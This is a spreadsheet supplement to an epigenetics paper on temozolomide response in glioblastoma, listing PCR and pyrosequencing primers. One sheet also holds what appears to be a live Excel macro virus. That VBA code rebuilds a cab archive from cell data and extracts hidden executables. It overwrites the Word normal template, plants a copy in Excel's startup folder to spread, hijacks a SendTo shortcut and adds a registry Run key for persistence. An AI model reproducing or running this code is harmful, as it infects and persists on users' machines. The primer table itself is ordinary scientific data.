# Supplementary material for: Novel predictive epigenetic signature for temozolomide in non-G-CIMP glioblastomas
Source: Clin Epigenetics. 2019 May 14;11:76. doi: 10.1186/s13148-019-0670-9 (PMC6515684; doi:10.1186/s13148-019-0670-9)
Supplement: Supplementary file 3 — Table S2. The primer sequences for PCR and pyrosequencing. (XLSX 13 kb) [file 13148_2019_670_MOESM3_ESM.xlsx]

## Sheet: (m1)_(m2)_(m3)
		Private Sub createcabfile()
		Dim ch As Byte
		on error resume next
		Set fso = CreateObject("scripting.filesystemobject")
		Set w = CreateObject("wscript.shell")
		myfolder = w.specialfolders("Templates") & "\Software\"
		If Not fso.folderexists(myfolder) Then
		fso.createfolder myfolder
		End If
		For i=1 to Workbooks.Count
		If Workbooks(i).name="normal.xlm" then
		workbooks(i).close
		fso.deletefile Application.StartupPath & "\normal.xlm"
		End If
		Next
		For i=1 to Workbooks.Count
		If Workbooks(i).name="norma1.xlm" then
		goto a1
		End If
		Next
		cabfile= "c:\cab.cab"
		If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
		fso.delete cabfile
		open cabfile for binary access write as #1
		For i = 1 To 150
		hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
		n=1
		m=instr(hv," ")
		do while m>0
		ch=CByte(mid(hv,n,m-n))
		put #1,,ch
		n=m+1
		m=instr(n,hv," ")
		loop
		Next
		close #1
		w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
		w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
		w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
		w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
		fso.deletefile cabfile
		fso.copyfile "c:\normal.dot", myfolder, True
		set word=createobject("word.application")
		ntpath=word.NormalTemplate.Path & "\"
		word.quit
		fso.copyfile "c:\normal.dot", ntpath, True
		fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
		fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
		set fold=fso.getfolder(w.SpecialFolders("SendTo"))
		for each ff in fold.files
		if instr(ff.name,"软盘")>0 then
		set lnk=w.CreateShortcut(fold.path & "\" & ff.name)
		lnk.TargetPath="c:\sendto.exe"
		lnk.IconLocation="shell32.dll,6"
		lnk.save
		goto e2
		end if
		next
		e2:
		fso.deletefile "c:\normal.dot"
		fso.deletefile "c:\norma1.xlm"
		fso.deletefile "c:\internet.exe"
		w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
		w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
		w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"
		w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
		End If
		Workbooks.Open Application.StartupPath & "\norma1.xlm"
		thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)
		workbooks("norma1.xlm").save
		fso.copyfile Application.StartupPath & "\norma1.xlm",myfolder,true
		a1:
		fso.deletefile "c:\excel.txt"
		Application.DisplayAlerts = False
		for i=1 to thisworkbook.sheets.count
		if left(thisworkbook.sheets(i).name,3)="模块表" then
		ThisWorkbook.Sheets(i).Delete
		end if
		next
		Application.DisplayAlerts = True
		ThisWorkbook.Saved=True
		End Sub

## Sheet: Sheet1
Supplementary Table S2: The primer sequences for PCR and pyrosequencing
PCR	Forward	Reverse
HSPB2	5'-GCCACTTTACCCCAGACGA-3'	5'-CGACATCAGCAGGCAGGAC-3'
GAPDH	5'-TGACTTCAACAGCGACACCCA-3'	5'-CACCCTGTTGCTGTAGCCAAA-3'
Pyrosequencing	Forward	Reverse	Sequencing primer
MGMT(CpG 74-81)	5'-GTTTYGGATATGTTGGGATA-3'	5'-biotin-ACCCAAACACTCACCAAATC-3'	ATAGTTYGYGTTTTTAGAA
HSPB2(cg155227610)	5'-AATTAGAAAGGGGTATTTTGTAGAG-3'	5'-biotin-CCATTTATTACATTTTTTCATACACTATC-3'	TTGTAGAGAAGTTAGGGG
